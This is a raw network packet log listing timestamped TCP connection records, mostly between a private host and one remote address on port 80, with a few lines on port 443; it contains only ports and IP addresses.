Sep 27, 2024 01:49:55.554038048 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554047108 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554047108 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554065943 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554078102 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554089069 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554100990 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554107904 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554111004 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554122925 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554133892 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554153919 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554161072 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554174900 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554188967 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554198027 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554212093 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554224014 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554234028 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554291964 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554291964 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554291964 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554291964 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554291964 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554299116 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554310083 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554344893 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554347992 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554359913 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554372072 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554383039 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554394960 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554399967 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554408073 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554418087 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554419994 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554433107 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554445982 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554459095 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554476976 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554488897 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554492950 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554492950 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554492950 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554518938 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554609060 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554620981 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554632902 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554656982 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554668903 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554678917 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554691076 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554702997 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554713964 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554752111 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554753065 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554753065 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554753065 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554783106 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554802895 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554814100 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554843903 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554855108 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554886103 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554888010 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554898977 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554909945 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554922104 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.554930925 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.554930925 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.555006027 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.555061102 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.555072069 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.555083036 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.555114031 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.555116892 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.555125952 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.555138111 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.555150032 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.555157900 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.555181980 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.555191040 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.555202961 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.555214882 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.555227041 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.555239916 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.555249929 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.555272102 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.555272102 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.555301905 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.596426964 CEST	443	49744	104.21.58.182	192.168.2.8
Sep 27, 2024 01:49:55.596548080 CEST	49744	443	192.168.2.8	104.21.58.182
Sep 27, 2024 01:49:55.598205090 CEST	49744	443	192.168.2.8	104.21.58.182
Sep 27, 2024 01:49:55.598213911 CEST	443	49744	104.21.58.182	192.168.2.8
Sep 27, 2024 01:49:55.598467112 CEST	443	49744	104.21.58.182	192.168.2.8
Sep 27, 2024 01:49:55.599726915 CEST	49744	443	192.168.2.8	104.21.58.182
Sep 27, 2024 01:49:55.599726915 CEST	49744	443	192.168.2.8	104.21.58.182
Sep 27, 2024 01:49:55.599797964 CEST	443	49744	104.21.58.182	192.168.2.8
Sep 27, 2024 01:49:55.638745070 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.638761044 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.638777018 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.638807058 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.638818979 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.638832092 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.638843060 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.638853073 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.638873100 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.638873100 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.638906002 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.641002893 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.641014099 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.641025066 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.641037941 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.641048908 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.641061068 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.641072035 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.641083002 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.641088963 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.641089916 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.641089916 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.641125917 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.641247988 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647243023 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647255898 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647268057 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647340059 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647351980 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647361994 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647416115 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647416115 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647416115 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647419930 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647433043 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647444010 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647456884 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647468090 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647479057 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647490025 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647501945 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647512913 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647527933 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647530079 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647530079 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647530079 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647557020 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647559881 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647568941 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647579908 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647591114 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647602081 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647604942 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647630930 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647643089 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647650003 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647653103 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647666931 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647677898 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647677898 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647685051 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647696972 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647706985 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647711992 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647717953 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647728920 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647741079 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647747040 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647747040 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647778988 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647790909 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647803068 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647814035 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647851944 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647865057 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647876978 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647891045 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647895098 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647896051 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647896051 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647901058 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647912979 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647924900 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647948980 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647959948 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647972107 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.647993088 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647993088 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647993088 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.647993088 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648180008 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648190022 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648200989 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648211002 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648221970 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648231983 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648242950 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648250103 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648250103 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648251057 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648253918 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648264885 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648276091 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648288012 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648299932 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648315907 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648315907 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648315907 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648329973 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648344994 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648348093 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648359060 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648370981 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648384094 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648396015 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648410082 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648420095 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648431063 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648442030 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648452997 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648463964 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648474932 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648487091 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648498058 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648499012 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648499012 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648499012 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648499012 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648499012 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648509026 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648519993 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648528099 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648530960 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648600101 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648691893 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648718119 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648730040 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648741007 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648767948 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648778915 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648789883 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648811102 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648811102 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648817062 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648828030 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648840904 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648853064 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648863077 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648874044 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648880005 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648880005 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648885965 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648895025 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648897886 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648910046 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648920059 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648931980 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648942947 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648950100 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648953915 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648953915 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.648961067 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648972988 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648983955 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.648991108 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.649014950 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.649045944 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.649350882 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.730986118 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.731021881 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.731033087 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.731107950 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.731120110 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.731136084 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.731148005 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.731158018 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.731282949 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.731282949 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.731282949 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.731282949 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.733370066 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.733390093 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.733412981 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.733432055 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.733439922 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.733447075 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.733453035 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.733459949 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.733469963 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.733510971 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.733556032 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.734108925 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.737510920 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.737548113 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.737566948 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.737584114 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.737596035 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.737606049 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.737626076 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.737643003 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.737653017 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.737665892 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.737689972 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.737756968 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.737756968 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.737756968 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.737756968 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.737797976 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.737808943 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.737818956 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.737831116 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.737842083 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.737871885 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.737871885 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.737915993 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.737958908 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.737977982 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.737989902 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738002062 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738013029 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738025904 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738055944 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738055944 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:55.738092899 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738104105 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738115072 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738126040 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738137007 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738147974 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738239050 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738254070 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738265038 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738276005 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738287926 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:55.738298893 CEST	80	49743	147.45.44.104	192.168.2.8
